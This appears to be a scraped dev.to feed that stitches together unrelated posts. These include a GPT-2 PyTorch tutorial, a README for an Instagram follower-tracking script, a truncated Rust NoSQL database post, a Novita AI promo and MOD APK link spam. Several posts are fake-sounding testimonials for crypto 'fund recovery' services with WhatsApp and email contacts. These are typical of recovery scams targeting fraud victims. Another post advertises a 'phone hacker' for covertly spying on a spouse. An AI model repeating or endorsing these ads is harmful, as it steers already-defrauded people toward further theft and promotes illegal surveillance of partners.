clarity. Their proactive efforts to keep me informed and supported throughout the ordeal were truly reassuring and underscored their dedication to client satisfaction. In addition to its recovery services, Cyber Constable Intelligence also offers invaluable advice on safeguarding against future scams and protecting one's financial assets. Their proactive approach to educating clients on best practices for preventing financial fraud highlighted their commitment to not only recovering funds but also preventing future victimization. This proactive stance sets Cyber Constable Intelligence apart as a reliable partner in navigating the complexities of financial recovery. I endorse Cyber Constable Intelligence to anyone who has fallen victim to financial fraud or is at risk of doing so. Their dedication to their clients makes them a beacon of hope in the aftermath of fraudulent incidents. My tale with them has been transformative, and I am immensely grateful for their pivotal role in helping me regain my stolen funds and peace of mind. If you find yourself in a similar situation, do not hesitate to seek assistance from Cyber Constable Intelligence – they are truly a lifeline in times of financial distress. Reach out to them with the information below: WhatsApp info: +1 ( 2 5 2 ) 3 7 8- 7 6 1 1 Website info: https://cyberconstableintelligence… com) Email info: (support(@)cyberconstableintelligence).  com)
becky_lawhon_9898910d0431
1,912,130
HIRING THE BEST BITCOIN RECOVERY EXPERT FROM CYBER CONSTABLE INTELLIGENCE
WhatsApp info: +1 ( 252 ) 378- 7611 Website info: https://cyberconstableintelligence… com) Email...
0
2024-07-05T02:00:19
https://dev.to/mary_joyce_8aff0cb5c2b5f2/hiring-the-best-bitcoin-recovery-expert-from-cyber-constable-intelligence-1i3h
blockchain, bitcoin, hiring, programming
WhatsApp info: +1 ( 252 ) 378- 7611 Website info: https://cyberconstableintelligence… com) Email info: (support(@)cyberconstableintelligence).  com) Just a mere month ago, I found myself teetering on the precipice of financial disaster, all thanks to an ill-fated decision to invest my hard-earned £5000 with a crypto investment company I stumbled upon on Telegram. The promises were grandiose, the returns seemingly too good to be true. And, as it turned out, they were indeed too good to be true. The individual behind the screen painted a mesmerizing picture of success, luring me in with the allure of high returns and quick profits. Naive and hopeful, I took the plunge, depositing my savings into their platform with dreams of financial freedom dancing in my mind. However, the dream quickly soured into a nightmare when I attempted to withdraw my initial investment. Despite seeing the purported amount displayed tantalizingly on the dashboard, access to my funds was inexplicably barred. Panic set in as I realized I had fallen victim to a meticulously crafted scam. The realization hit me like a freight train. I was on the brink of bankruptcy, my hard-earned money seemingly evaporating into thin air. Feelings of helplessness and despair engulfed me as I grappled with the harsh reality of my situation. Just when I was about to succumb to despair, a ray of hope pierced through the darkness in the form of an article I stumbled upon on Medium. It spoke of a company by the name of Cyber Constable Intelligence, claiming to specialize in recovering funds lost to online scams. Skeptical yet desperate, I decided to reach out to them, clinging to the sliver of hope they offered. To my astonishment and immense relief, Cyber Constable Intelligence lived up to its lofty reputation. With unparalleled expertise and professionalism, they swiftly embarked on the arduous task of retrieving my lost funds. Within a mere week, they had succeeded where I had thought all hope was lost—they helped me recover my £5000. Words cannot express the overwhelming sense of gratitude and relief I felt upon receiving my reclaimed funds. Cyber Constable Intelligence not only salvaged me from the jaws of financial ruin but restored my faith in humanity. Their unwavering dedication and commitment to their clients are a testament to their integrity and reliability. This has taught me invaluable lessons that I will carry with me for a lifetime. I have learned to exercise caution and discernment in my financial endeavors, to tread carefully, and to scrutinize every opportunity that presents itself. No longer will I be swayed by the false promises of strangers peddling dreams of easy wealth. Instead, I vow to approach investments with meticulous care, consulting with financial experts and conducting thorough due diligence before parting ways with my hard-earned money. I understand now, more than ever, the importance of investing only what I can afford to lose and staying vigilant against the ever-looming specter of online scams. To anyone who finds themselves teetering on the edge of financial ruin or falling victim to the siren song of fraudulent schemes, I implore you—do not lose hope. There are reputable recovery services like Cyber Constable Intelligence out there, ready and willing to lend a helping hand in your worst hour. I urge all who read this to heed my cautionary tale and approach investments with the utmost care and diligence. Stay safe, stay informed, and may your financial endeavors be guided by wisdom and prudence.
mary_joyce_8aff0cb5c2b5f2
1,912,129
Bus Simulator code
You can download Bus Simulator Ultimate MOD APK from various APK websites. Always ensure you are...
0
2024-07-05T01:58:22
https://dev.to/dk_bymedk_ed5eb6e885850/bus-simulator-code-1elc
webdev, beginners, programming
You can download [Bus Simulator Ultimate MOD APK](https://bussimulatorultimatemodapk.net/) from various APK websites. Always ensure you are using trusted sources to avoid malware and other security risks. Sites like APKPure or APKMirror are generally considered reliable. Remember that using MOD APKs might violate the game's terms of service. Proceed with caution and at your own risk.
dk_bymedk_ed5eb6e885850
1,912,128
Here's how you can build and train GPT-2 from scratch using PyTorch
Are you tired of always using ChatGPT and curious about how to build your own language model? Well,...
0
2024-07-05T01:58:05
https://dev.to/amit_kharel_aae65abe2b111/heres-how-you-can-build-and-train-gpt-2-from-scratch-using-pytorch-345n
chatgpt, gpt3, llm, ai
Are you tired of always using ChatGPT and curious about how to build your own language model? Well, you’re in the right place! Today, we’re going to create GPT-2 , a powerful language model developed by OpenAI, from scratch that can generate human-like text by predicting the next word in a sequence. To dive deeper into the theory and architecture of GPT-2, I highly recommend reading [The Illustrated GPT-2](https://jalammar.github.io/illustrated-gpt2/) by Jay Alammar. This article provides an excellent visual and intuitive explanation of GPT-2 and its inner workings. I’ll be referring to some of the visuals from the article to explain things better. > I have tried to make this as simpler as possible. Anyone with any level of Python or machine learning can follow along and build the model. ## Resources This project will take you through all the steps for building a simple GPT-2 model and train on bunch of Taylor Swift and Ed Sheeran songs. We’ll see what it will come up at the end :). The dataset and source codes for this article will be available in [Github](https://medium.com/r?url=https%3A%2F%2Fgithub.com%2Fajeetkharel%2Fgpt2-from-scratch). > I’ll also add a Jupyter Notebook which replicates this article so you can follow along with running code and understanding side-by-side. ## Building GPT-2 Architecture We will take this project step-by-step by continuously improving a bare-bone model and adding layers based on the original [GPT-2](https://cdn.openai.com/better-language-models/language_models_are_unsupervised_multitask_learners.pdf) implementation. Here are the steps we will follow: 1. **Building a custom Tokenizer** 2. **Building a Data Loader** 3. **Train a simple language model** 4. **Implement GPT-2 architecture (part 2)** [🔗] (https://medium.com/@mramitkharel/heres-how-you-can-build-and-train-gpt-2-from-scratch-using-pytorch-part-2-9b41d15baf62) This project is divided into two parts, the first one goes through the basics of language modelling and [Part 2](https://medium.com/@mramitkharel/heres-how-you-can-build-and-train-gpt-2-from-scratch-using-pytorch-part-2-9b41d15baf62) jumps straight into GPT-2 implementation. I suggest you to follow along with the article and build it yourself which makes learning GPT-2 more interesting and fun. > Note: This whole project will be done in a single python file so it will be easy for you to follow along block by block. Final Model: ![GPT-2 Model Architecture](https://cdn-images-1.medium.com/max/2000/1*35AaHBa5imxVIbbjByIE2Q.png) Final Model output: Your summer has a matter likely you trying I wish you would call Oh-oh, I'll be a lot of everyone I just walked You're sorry"Your standing in love out, And something would wait forever bring 'Don't you think about the story If you're perfectly I want your beautiful You had sneak for you make me This ain't think that it wanted you this enough for lonely thing It's a duchess and I did nothin' home was no head Oh, but you left me Was all the less pair of the applause Honey, he owns me now But've looks for us?" If I see you'll be alright You understand, a out of the Wait for me I can't call Everything Oh, no words don't read about me You should've been so You're doing what you so tired, If you, you got perfect fall Like the song? Then let’s get building.. ## **1. Building a custom Tokenizer** Language models don’t see text like us. Instead they recognize sequence of numbers as tokens of specific text. So, the first step is to import our data and build our own character level Tokenizer. 
data_dir = "data.txt" text = open(data_dir, 'r').read() # load all the data as simple string # Get all unique characters in the text as vocabulary chars = list(set(text)) vocab_size = len(chars) Example: ![](https://cdn-images-1.medium.com/max/2000/1*34WkqssQKHKpdO1yTH0n-g.png) If you see the output above, we have a list of all unique characters extracted from the text data in the initialization process. Character tokenization is basically using the index position of characters from the vocabulary and mapping it to corresponding character in the input text. # build the character level tokenizer chr_to_idx = {c:i for i, c in enumerate(chars)} idx_to_chr = {i:c for i, c in enumerate(chars)} def encode(input_text: str) -> list[int]: return [chr_to_idx[t] for t in input_text] def decode(input_tokens: list[int]) -> str: return "".join([idx_to_chr[i] for i in input_tokens]) Example: ![](https://cdn-images-1.medium.com/max/2000/1*adFjPqc2Ks1MY2uXuB9DGQ.png) Convert our text data into tokens: Installation: pip install torch import torch # use cpu or gpu based on your system device = "cpu" if torch.cuda.is_available(): device = "cuda" # convert our text data into tokenized tensor data = torch.tensor(encode(text), dtyppe=torch.long, device=device) Now, we have the tokenized tensor data where each characters in the text is converted to the respective tokens. **So far:** import torch data_dir = "data.txt" text = open(data_dir, 'r').read() # load all the data as simple string # Get all unique characters in the text as vocabulary chars = list(set(text)) vocab_size = len(chars) # build the character level tokenizer chr_to_idx = {c:i for i, c in enumerate(chars)} idx_to_chr = {i:c for i, c in enumerate(chars)} def encode(input_text: str) -> list[int]: return [chr_to_idx[t] for t in input_text] def decode(input_tokens: list[int]) -> str: return "".join([idx_to_chr[i] for i in input_tokens]) # convert our text data into tokenized tensor data = torch.tensor(encode(text), dtyppe=torch.long, device=device) ## **2. Building a Data Loader** Now, before building our model, we have to define how we are going to feed the data into the model for training and what the data looks like in terms of dimensions and batch size. 
Let’s define our data loader as below: train_batch_size = 16 # training batch size eval_batch_size = 8 # evaluation batch size context_length = 256 # number of tokens processed in a single batch train_split = 0.8 # percentage of data to use from total data for training # split data into trian and eval n_data = len(data) train_data = data[:int(n_data * train_split)] eval_data = data[int(n_data * train_split):] class DataLoader: def __init__(self, tokens, batch_size, context_length) -> None: self.tokens = tokens self.batch_size = batch_size self.context_length = context_length self.current_position = 0 def get_batch(self) -> torch.tensor: b, c = self.batch_size, self.context_length start_pos = self.current_position end_pos = self.current_position + b * c + 1 # if the batch exceeds total length, get the data till last token # and take remaining from starting token to avoid always excluding some data add_data = -1 # n, if length exceeds and we need `n` additional tokens from start if end_pos > len(self.tokens): add_data = end_pos - len(self.tokens) - 1 end_pos = len(self.tokens) - 1 d = self.tokens[start_pos:end_pos] if add_data != -1: d = torch.cat([d, self.tokens[:add_data]]) x = (d[:-1]).view(b, c) # inputs y = (d[1:]).view(b, c) # targets self.current_position += b * c # set the next position return x, y train_loader = DataLoader(train_data, train_batch_size, context_length) eval_loader = DataLoader(eval_data, eval_batch_size, context_length) Example: ![](https://cdn-images-1.medium.com/max/2000/1*GMpC_jFxFpk_1xK19YvbrA.png) Now we have our own customized data loader for both training and evaluation. The loader has a get_batch function which returns batches of batch_size * context_length. If you are wondering why x is from start to end and y is from start+1 to end+1, it’s because the main task for this model will be to predict next sequence given the previous. So there will be an extra token in y for it to predict the (n+1) token given last n tokens of x. If it sounds complicated look at the below visual: ![*Figure 2: GPT-2 Input & Output flow from “The Illustrated GPT-2” by Jay Alammar.*](https://cdn-images-1.medium.com/max/2864/0*jTrSzRD-KGPs3v5E.gif) ## **3. Train a simple language model** Now we are ready to build and train a simple language model using the data we have just loaded. For this section, we will keep it very simple and implement a simple Bi-Gram Model where given the last token predict the next token. As you can see below we will be using just the Embedding layer while ignoring the main decoder block. An Embedding layer represents n = d_model unique properties of all the characters in our vocabulary and based on which the layer pops out the property using the token index or in our case the index of our character in the vocabulary. You will be amazed how well the model will behave just by using the Embeddings. And we will be improving the model step by step by adding more layers, so sit tight and follow along. ![Simple Bi-Gram Model](https://cdn-images-1.medium.com/max/2000/1*9cYT2nBANRzBr3vqQVLBsw.png) **Initialization**: # used to define size of embeddings d_model = vocab_size The embedding dimension or d_model is vocab_size currently because the final output has to map to the logits for each character in vocab to calculate their probabilities. Later on we will introduce a Linear layer which will map d_model to vocab_size and then we can have a custom embedding_dimension. 
**Model**: import torch.nn as nn import torch.nn.functional as F class GPT(nn.Module): def __init__(self, vocab_size, d_model): super().__init__() self.wte = nn.Embedding(vocab_size, d_model) # word token embeddings def forward(self, inputs, targets = None): logits = self.wte(inputs) # dim -> batch_size, sequence_length, d_model loss = None if targets != None: batch_size, sequence_length, d_model = logits.shape # to calculate loss for all token embeddings in a batch # kind of a requirement for cross_entropy logits = logits.view(batch_size * sequence_length, d_model) targets = targets.view(batch_size * sequence_length) loss = F.cross_entropy(logits, targets) return logits, loss def generate(self, inputs, max_new_tokens): # this will store the model outputs along with the initial input sequence # make a copy so that it doesn't interfare with model for _ in range(max_new_tokens): # we only pass targets on training to calculate loss logits, _ = self(inputs) # for all the batches, get the embeds for last predicted sequence logits = logits[:, -1, :] probs = F.softmax(logits, dim=1) # get the probable token based on the input probs idx_next = torch.multinomial(probs, num_samples=1) inputs = torch.cat([inputs, idx_next], dim=1) # as the inputs has all model outputs + initial inputs, we can use it as final output return inputs m = GPT(vocab_size=vocab_size, d_model=d_model).to(device) We have now successfully defined our model with just one Embedding layer and Softmax for token generation. Let’s see how our model behaves when given some input characters. ![Output](https://cdn-images-1.medium.com/max/2000/1*dQpkxEARkvXbpJpI7dCRYA.png) 😄 Pretty interesting!! But we are not quite there yet. Now the final step is to train our model and give it some knowledge about the characters. Let’s setup our optimizer. We will use a simple AdamW optimizer for now with 0.001 learning rate. We will go through improving the optimization in later sections. lr = 1e-3 optim = torch.optim.AdamW(m.parameters(), lr=lr) Below is a very simple training loop. epochs = 5000 eval_steps = 1000 # perform evaluation in every n steps for ep in range(epochs): xb, yb = train_loader.get_batch() logits, loss = m(xb, yb) optim.zero_grad(set_to_none=True) loss.backward() optim.step() if ep % eval_steps == 0 or ep == epochs-1: m.eval() with torch.no_grad(): xvb, yvb = eval_loader.get_batch() _, e_loss = m(xvb, yvb) print(f"Epoch: {ep}\tlr: {lr}\ttrain_loss: {loss}\teval_loss: {e_loss}") m.train() # back to training mode Let’s run: ![Output](https://cdn-images-1.medium.com/max/2000/1*ikOrVlB0KHzrTWTpOLi9Lw.png) So we got a pretty good loss result. But we are not there yet. As you can see, the error decreased by a higher amount until epoch 2000 and not much improvements afterwards. It’s because the model doesn’t yet have much brain power (or layers/neural networks) and it’s just comparing embedding of one character with another. The output now looks like below: ![Output](https://cdn-images-1.medium.com/max/2000/1*fEEJXUZrhAIORdD0tXk_wA.png) 😮 OK!! Not very pleasing but definitely some improvements than the first generation which was without any training (Obviously). The model is starting to know how the songs are formatted and the lines and everything which is pretty impressive. 
Now, as this article is getting quite long, I will add the rest of the sections in Part 2 below: * [Build and Train GPT-2 (Part 2)](https://medium.com/@amitkharel/heres-how-you-can-build-and-train-gpt-2-from-scratch-using-pytorch-part-2-9b41d15baf62) Thanks for reading the article. I hope you learned something new. If you have any questions or feedback, feel free to leave a comment. ## References *Automatic Arabic Poem Generation with GPT-2 — Scientific Figure on ResearchGate. Available from: [https://www.researchgate.net/figure/GPT-2-architecture-Heilbron-et-al-2019_fig1_358654229](https://www.researchgate.net/figure/GPT-2-architecture-Heilbron-et-al-2019_fig1_358654229)* *Alammar, J. (2018). The Illustrated GPT-2 [Blog post]. Retrieved from [https://jalammar.github.io/illustrated-gpt2/](https://jalammar.github.io/illustrated-gpt2/)*
amit_kharel_aae65abe2b111
1,912,125
A Simple Instagram Tracking Script Written in Python
python3 main.py -h usage: Instagram Tracker [-h] -u USERNAME 📸 an Instagram tracker that logs...
0
2024-07-05T01:56:17
https://dev.to/ibnaleem/a-simple-instagram-tracking-script-written-in-python-in9
python, opensource, security, cybersecurity
![proof of concept](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tittxxd7sbe73yq44sk1.png) ``` python3 main.py -h usage: Instagram Tracker [-h] -u USERNAME 📸 an Instagram tracker that logs any changes to an Instagram account (followers, following, posts, and bio) options: -h, --help show this help message and exit -u USERNAME, --username USERNAME The username of the account to track 🤝 Contribute: https://github.com/ibnaleem/instatracker ``` > You must login to *your* Instagram account in order to properly scrape someone else's Instagram account. This is due to Instagram blocking `HTTPS GET` requests from unauthenticated cookies. Your login information is never stored. See more [here](https://github.com/ibnaleem/instatracker/blob/main/main.py#L51C1-L56C136) and [here](https://github.com/instaloader/instaloader/blob/master/instaloader/instaloadercontext.py#L253C1-L338C43). > You can always create/use an alt-account for the login. ## Installation > [Install Python if you don't have it already](https://www.python.org/downloads/) ### Clone this repository: ``` $ git clone https://github.com/ibnaleem/instatracker.git ``` ### Install dependencies: ``` $ pip install -r requirements.txt ``` ### Set `user` & `passwd` field on [line 56](https://github.com/ibnaleem/instatracker/blob/main/main.py#L56) ```python self.bot.login(user="YOUR INSTAGRAM USERNAME", passwd="YOUR INSTAGRAM PASSWORD") # this allows us to access & scrape Instagram. ``` ### Run the script ``` $ python3 main.py -u USERNAME ``` ## Automated Logging [InstaTracker](https://github.com/ibnaleem/instatracker) not only displays all modifications an Instagram account makes directly to the terminal (e.g., *USERNAME has unfollowed 1 person*), but it also records these changes in a text file, including the date and time. ``` ------2024-06-30 01:01:13.659694+00:00------ johndoe has 100 johndoe is following 100 people johndoe has 0 posts johndoe has the following bio: this is my biography ------2024-06-31 02:03:15.761715+00:00------ johndoe has lost 2 followers (100 followers --> 98 followers) ------2024-06-31 05:03:15.761715+00:00------ johndoe has gained 5 followers (98 followers --> 103 followers) ... ``` This script checks for any changes every 5 minutes because Instagram's firewall starts blocking requests that are sent too quickly. You can manually update this [here](https://github.com/ibnaleem/instatracker/blob/main/main.py#L70), but do not be surprised if the script stops working. ## Built With - [Python](https://www.python.org/) - [Instaloader](https://github.com/instaloader/instaloader) - [Rich](https://github.com/Textualize/rich) ## LICENSE This repository is under the [MIT License](https://github.com/ibnaleem/instatracker/blob/main/LICENSE) ## Created By [Ibn Aleem](https://www.linkedin.com/in/shaffan-aleem-b7a852255/)
ibnaleem
1,912,127
BRILLIANT CRYPTO/UDST RECOVERY EXPERT/(FOLKWIN EXPERT RECOVERY)
I believe I have fallen victim to a sophisticated scam orchestrated by deceitful individuals. It all...
0
2024-07-05T01:55:04
https://dev.to/dionysios_aikaterina_ad9c/brilliant-cryptoudst-recovery-expertfolkwin-expert-recovery-gc
I believe I have fallen victim to a sophisticated scam orchestrated by deceitful individuals. It all began when I received an invitation to trade on a platform website, lured in by promises of substantial returns on investments. Intrigued by the potential profits, I transferred $76,000 USD to this platform. Initially, everything seemed promising as I witnessed a supposed profit of $34,000 USD added to my initial capital. However, my optimism quickly turned to suspicion when I was coerced into transferring an additional $5,000 USD to avoid having my funds blocked. As if that wasn't enough, I was then asked for another $10,000 USD, which raised serious red flags. The simplicity of the website compared to the one initially presented to me further fueled my doubts. Realizing that I may have fallen into a scam, I embarked on a mission to uncover the truth. Through diligent research and seeking advice, I stumbled upon <FOLKWIN EXPERT RECOVERY>, a renowned entity specializing in retrieving funds lost to fraudulent schemes. With no time to waste, I decided to enlist their services, desperate to salvage what remained of my investments. Despite the initial skepticism about online recovery services, I was willing to take the chance. <FOLKWIN EXPERT RECOVERY> proved to be a beacon of hope in my darkest hour. Within an astonishingly short span of less than 32 hours, they successfully recovered all my funds. The relief and gratitude I felt were immeasurable, knowing that I had avoided a catastrophic loss thanks to their expertise and swift action. While their services were not without cost, the investment was undeniably worthwhile given the alternative of losing everything to unscrupulous scammers. I am compelled to share my experience with <FOLKWIN EXPERT RECOVERY> as a testament to their efficacy and reliability. Their dedication to their clients are unmatched, providing a lifeline for individuals like myself who have fallen prey to financial fraud. I wholeheartedly recommend <FOLKWIN EXPERT RECOVERY> to anyone grappling with similar circumstances. Their ability to navigate complex financial landscapes and retrieve stolen funds is a testament to their expertise and commitment to justice. It is crucial to exercise caution and conduct thorough due diligence before engaging in financial transactions. Trusting reputable recovery services like <FOLKWIN EXPERT RECOVERY> can make all the difference in recovering lost funds and restoring peace of mind. Their track record speaks for itself, offering reassurance to victims and a deterrent to would-be scammers. <FOLKWIN EXPERT RECOVERY> has reaffirmed my belief in the power of resilience and informed decision-making. By sharing my story, I hope to raise awareness and prevent others from falling victim to similar fraudulent schemes. Remember, if you find yourself ensnared by financial fraudsters, there is hope. Contact <FOLKWIN EXPERT RECOVERY> for help, through this details below:: INFO (WhatsApp): +1 (740)705-0711 INFO (Email): FOLKWINEXPERTRECOVERY @ TECH-CENTER dot COM INFO (Website): WWW.FOLKWINEXPERTRECOVERY.COM God bless, Miss Dionysios Aikaterina .. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/188j9y4hwzoh3akobjw0.jpg)
dionysios_aikaterina_ad9c
1,912,126
WEB BAILIFF CONTRACTORS LEGIT PHONE HACKER
I suspected my wife of 5 years of cheating on me and it turned out she was seeing her high school...
0
2024-07-05T01:52:57
https://dev.to/philip_grisly_ecd2f26ea7b/web-bailiff-contractors-legit-phone-hacker-22f8
I suspected my wife of 5 years of cheating on me and it turned out she was seeing her high school lover even though we have 2 little children. I hopped on the internet to look for a phone hacker so that I could confirm my fears when I came across Web Bailiff Contractors, who have hundreds of reviews as legit phone hackers. I gave them her info and they got back to me in about 4 hours. You can just search them on Google and head on to their website, where you can communicate via the chat feature or the contact details displayed.
philip_grisly_ecd2f26ea7b
1,911,301
Best 5 AI Girl Generators for Realistic Creations in 2024
Explore the top 5 AI girl generators to create realistic AI girls. Find how to develop your own AI...
0
2024-07-05T01:47:36
https://dev.to/novita_ai/best-5-ai-girl-generators-for-realistic-creations-in-2024-3pki
Explore the top 5 AI girl generators to create realistic AI girls. Find how to develop your own AI girl generator in our blog. ## Introduction Artificial Intelligence is evolving rapidly and making its way to every industry. AI girl generators are one of the most interesting applications of AI in recent times. They allow you to create lifelike images of girls using computer algorithms that can generate realistic features.  In this blog, we will understand what AI girl generators are, their features, and how they can be used. We have also compiled a list of the best five AI girl generators for you to choose from. Additionally, we will provide APIs to help you develop your own AI girl generator. So, let's dive into the world of AI girl generators and explore if they could be the future of digital art! ## Understanding AI Girl Generators Utilizing AI algorithms, AI girl generators provide a convenient and efficient way to create virtual characters. ### What are AI Girl Generators? AI Girl Generators are tools powered by artificial intelligence, allowing users to create and customize AI digital Girls in various styles. They utilize deep learning skills to recognize and replicate complex patterns from the training dataset, and then create a generative model. With the power of Natural Language Processing (NLP), they translate text prompts into visual elements and synthesize an image. ### Features of AI Girl Generators - **User-Friendly Interface:** AI girl generators offer intuitive interfaces that make it easy for beginners to create their own AI girls. - **High Customization:** Users can customize AI girls according to their preferences, including facial features, hairstyles, clothing, and more. - R**ealism and Detail:** Advanced AI algorithms enable these generators to produce AI girls with lifelike facial features, skin textures, and body movements. - **Diverse Styles Options:** AI Girl Generators can create girls in a wide range of styles, such as fantasy girls, warrior girls, magical girls, schoolgirls, and princess girls. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rdzrhrj6uw7u0dg9cs6t.png) ## Top 5 AI Girl Generators for Realistic Creations in 2024 Get a deeper understanding of the AI girl generator from the features of the best five AI girl generators in the market in 2024. ### Fotor Fotor, as an AI girl generator, is recognized for its ability to quickly produce hyper-realistic images of female characters based on textual descriptions or uploaded images. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hpgcuqnpejuf89o1crnt.png) **Features** - It is compatible with both PC and mobile devices. - It provides a free trial. ### Artguru AI With ArtGuru's powerful text-to-image generator, you can generate stunning AI girls of all styles, such as realistic portraits, anime characters, imaginary beings, and more - all from descriptive text prompts. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/861qo62gr11yp8kpx04e.png) **Features** - The generated images can be used for commercial purposes. - Artguru AI provides various art styles, catering to diverse preferences. - It is accessible both online and via mobile applications. ### SoulGen SoulGen offers a versatile image generation tool that combines art style transfer, animation, and extensive customization features. 
Soulgen's concept designs stand out for their realistic aesthetics and high-quality outputs, making virtual girl characters visually captivating.  ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/w3dhreqi5bbdda9qe4ft.png) **Features** - Its pricing plans are flexible. - Regular updates of its image generation capabilities. ### BasedLabs BasedLabs is a platform that offers a suite of AI-powered tools designed to assist creators in generating and editing images and videos with high levels of realism and customization. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8pb1dm2r3ezmxu1z6n6m.png) **Features** - BasedLabs is designed to be user-friendly. - Users have full rights to use their AI-generated art. ### Novita AI **[Novita AI](https://novita.ai/)** is an emerging AI platform that not only can be used as an AI girl generator with various models but also provides over 100 APIs for developers to create and improve their existing generators. It offers flexible billing options without **[GPU](https://novita.ai/)** maintenance expenses. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9w0v62wyqmvm9rvvoad6.png) **Features** - Hundreds of APIs for developing AI tools. - 1000+ models for AI girl image generation. - Effortless Access and Scalable. ## How to Use an AI Girl Generator? With innumerable AI girl generators in the market, you can create your AI girls effortlessly nowadays. Here is a comprehensive guide on how to generate your AI girls from text description through Novita AI. ### Step-by-Step Guide to Creating Your Unique AI Girl - Step 1: Open the Novita AI website and create an account. - Step 2: Navigate to "**[txt2img](https://novita.ai/playground#txt2img)**" in its "Playground". - Step 3: Select a desired model from the list, like anime, digital art, and so on. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/x8p9sovpnwmxbaxa44cu.png) - Step 4: Enter the "Prompt" to describe your AI girl, including her facial expressions, hairstyle, and facial texture. - Step 5: Set the other parameters. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9mhxn99se9tic9c5a7sv.png) - Step 6: Generate and wait for your AI girls. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/613ucfnkyxlnhqz64meg.png) ### Tips to Enhance Your Experience with AI Girl Generators - Experiment with various text prompts for generating unique anime characters.  - Join Discord communities to share and learn new character-creation techniques.  - Explore artwork possibilities beyond anime, such as Disney or manga characters. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/43s32rhpdkgy447ttvno.png) ## Try to Develop Your Own AI Girl Generator The functions and models in Novita AI and other AI girl generators are pre-set. If you are not satisfied with them, you can develop your own AI girl generator to cater to your preference by easily integrating APIs. ### How to Develop an AI Girl Generator Through APIs? - Step 1: In Novita AI, navigate to the "**[API]( ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s9wos7mwj17uf9xe8fps.png) )**" and get the API key of the function you want, like Text to Image and Image to Image. - Step 2: Integrate the API key into your project backend, including making API requests, waiting for a response, and figuring out the one that fits into your remand. 
- Step 3: Give everything a thorough check over time, ensuring all works just as expected. - Step 4: Operate your project. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gs8jjc8w3gdzbudlco1d.png) ### Practical Applications of AI Girl Generator - **Digital Art and Illustration:** Artists can use AI girl generators to create unique AI art without the need for traditional drawing skills. - **Animation:** Animators can use images of AI anime girls as a starting point for 2D or 3D animations, or to create entire animated sequences. - **Virtual Influencers:** AI girl generators can be used to create virtual influencers for social media to engage with audiences through interactive content. - **AR and VR:** AI-generated characters can be integrated into AR and VR experiences, providing interactive and immersive environments. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8jpryka2gs07dtdrpv4t.png) ## Future of AI Girl Generators in Digital Art The future of AI Girl Generators in digital art is poised to be transformative and multifaceted, as these tools continue to evolve and integrate with artistic practices. They offer new possibilities for creativity, collaboration, and cultural expression. Artists and creators will likely continue to explore the boundaries of what is possible with these tools, leading to an exciting future for digital art. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qwqd6qealwiw7h6a0urp.png) ## Conclusion In conclusion, AI girl generators have revolutionized the world of digital art by providing a realistic and customizable approach to character creation. From Fotor to Novita AI, each platform has its unique features and advantages. As technology continues to advance, AI girl generators are likely to play an even bigger role in the future of digital art, opening up new possibilities and pushing the boundaries of creativity. So dive into the world of AI girl generators and unleash your artistic potential! > Originally published at [Novita AI](https://blogs.novita.ai/best-5-ai-girl-generators-for-realistic-creations-in-2024/?utm_source=dev_image&utm_medium=article&utm_campaign=ai-girl) > [Novita AI](https://novita.ai/?utm_source=dev_image&utm_medium=article&utm_campaign=top-5-ai-girl-generators-for-realistic-creations) is the all-in-one cloud platform that empowers your AI ambitions. With seamlessly integrated APIs, serverless computing, and GPU acceleration, we provide the cost-effective tools you need to rapidly build and scale your AI-driven business. Eliminate infrastructure headaches and get started for free - Novita AI makes your AI dreams a reality.
novita_ai
1,908,378
I created a nosql DB using rust
Well when i say i created a Nosql db using rust i mean kind of. like people ask me why would you do...
0
2024-07-05T01:42:42
https://dev.to/arindam_roy_382/i-created-a-nosql-db-using-rust-4lo5
programming, rust, database
Well when i say i created a Nosql db using rust i mean kind of. like people ask me why would you do that i always ask myself why not someone even though making js in 10 days would be good idea so i really don't think it would be consider as the most bad idea. so a Nosql db let's talk about this first so what is database is from our computer science class we all know database is a tool for storing and accessing the data . Now a database is consist of three many things it can have more components but this are the basic one ![visual presentation of my db](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/epdw15s92yefc30mamw6.png) 1) Data model (representation of the way we define models for db) 2) Storage Engine (responsible for storing , clearing disk and memory to access or delete data) 3) query engine (responsible for the talking to the db) Ok now let's define the document model first . I'm designing this after the mongodb document model which was made using c++ so it supports much more data types but we will make a very simple implementation of this. ```rust #[derive(Debug, Clone, Serialize, Deserialize)] pub struct Document { id: Uuid, created_at: DateTime<Utc>, updated_at: DateTime<Utc>, data: HashMap<String, Value>, } // document model #[derive(Debug, Clone, Serialize, Deserialize, PartialEq)] pub enum Value { Null, Boolean(bool), Integer(i64), Float(f64), String(String), Array(Vec<Value>), Object(HashMap<String, Value>), Date(DateTime<Utc>), } // basically we can put any kind of data into our db ``` so now we know how is our data gonna look like once it gets stored but how to store it is a challenge because remember in a database the most important part is saving something and retrieving something. we analyzed any database performance by it's read and write speed so it's absolutely crucial how you store your data . so i took a very simple approach here i just saved the data into the disk and kept a cache in the ram for faster retrieval. ```rust #[derive(Debug, Clone, Serialize, Deserialize)] struct BlockMetadata { id: String, size: usize, next_block: Option<u64>, } #[derive(Debug, Clone, Serialize, Deserialize)] struct Block { metadata: BlockMetadata, data: Vec<u8>, } // we use block to store the data in disk struct DiskManager { file: File, free_blocks: VecDeque<u64>, } struct Cache { blocks: HashMap<u64, Block>, lru: VecDeque<u64>, } // A deque tracking the least recently used (LRU) blocks for cache eviction. pub struct StorageEngine { disk: DiskManager, cache: Cache, index: HashMap<String, u64>, // Document ID to first block number } // is the core structure that ties everything together ``` Now we know how to store our data and after storing how it look like now we need to access the data for that we'll create a query engine of our own. I thought of creating a new template language for accessing the data then i though we are far behind 